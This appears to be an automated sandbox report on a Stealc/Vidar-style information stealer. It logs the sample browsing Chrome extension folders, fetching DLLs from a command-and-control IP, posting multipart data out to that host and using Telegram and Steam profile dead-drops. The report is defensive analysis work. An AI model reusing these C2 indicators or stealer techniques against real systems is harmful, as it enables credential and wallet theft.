Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00935B4D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	2_2_00935B4D
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0092CD0C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	2_2_0092CD0C

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 2_2_00935182 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

2_2_00935182

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]		2_2_009214AD
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax		2_2_009214AD

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.6:49993 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 95.217.220.103:443 -> 192.168.2.6:49993
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 95.217.220.103:443 -> 192.168.2.6:49992

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199786602107
Source: Malware configuration extractor	URLs: https://t.me/fun88rockskek

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /fun88rockskek HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199786602107 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 107.191.36.218Connection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 23.192.247.89 23.192.247.89
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: AKAMAI-ASUS AKAMAI-ASUS
Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49990 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49992 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49994 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49989 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49991 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49995 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50000 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50002 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50001 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50003 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49997 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49993 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50004 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50006 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50007 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50005 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50008 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50010 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50011 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50013 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50014 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50009 -> 95.217.220.103:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50012 -> 95.217.220.103:443

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 255Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIEHCFIECBGCBFHIJJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 5461Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCFHJDBKJKEBFHJEHIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIDBGDAFHJDHIDGDGIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCFBFBAEBKJKEBGCAEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIEGDBAEBFIIDHJJJEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 1025Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCFHJDBKJKEBFHJEHIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKJKFHCAEGDHIDGDHDAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDGDAAKFHIEHIECAFBAAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 109281Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIEHCFIECBGCBFHIJJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAAEGIJKEGHIDGCBAEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 331Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 107.191.36.218
Source: unknown	TCP traffic detected without corresponding DNS query: 107.191.36.218
Source: unknown	TCP traffic detected without corresponding DNS query: 107.191.36.218
Source: unknown	TCP traffic detected without corresponding DNS query: 107.191.36.218
Source: unknown	TCP traffic detected without corresponding DNS query: 107.191.36.218
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.220.103

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

2_2_00926963

Source: global traffic	HTTP traffic detected: GET /fun88rockskek HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199786602107 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 107.191.36.218Connection: Keep-AliveCache-Control: no-cache

Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: -Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: cowod.hopto.org

Source: unknown

Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.191.36.218/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.191.36.218/0
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.191.36.218/b
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.191.36.218/r
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.191.36.218:80
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
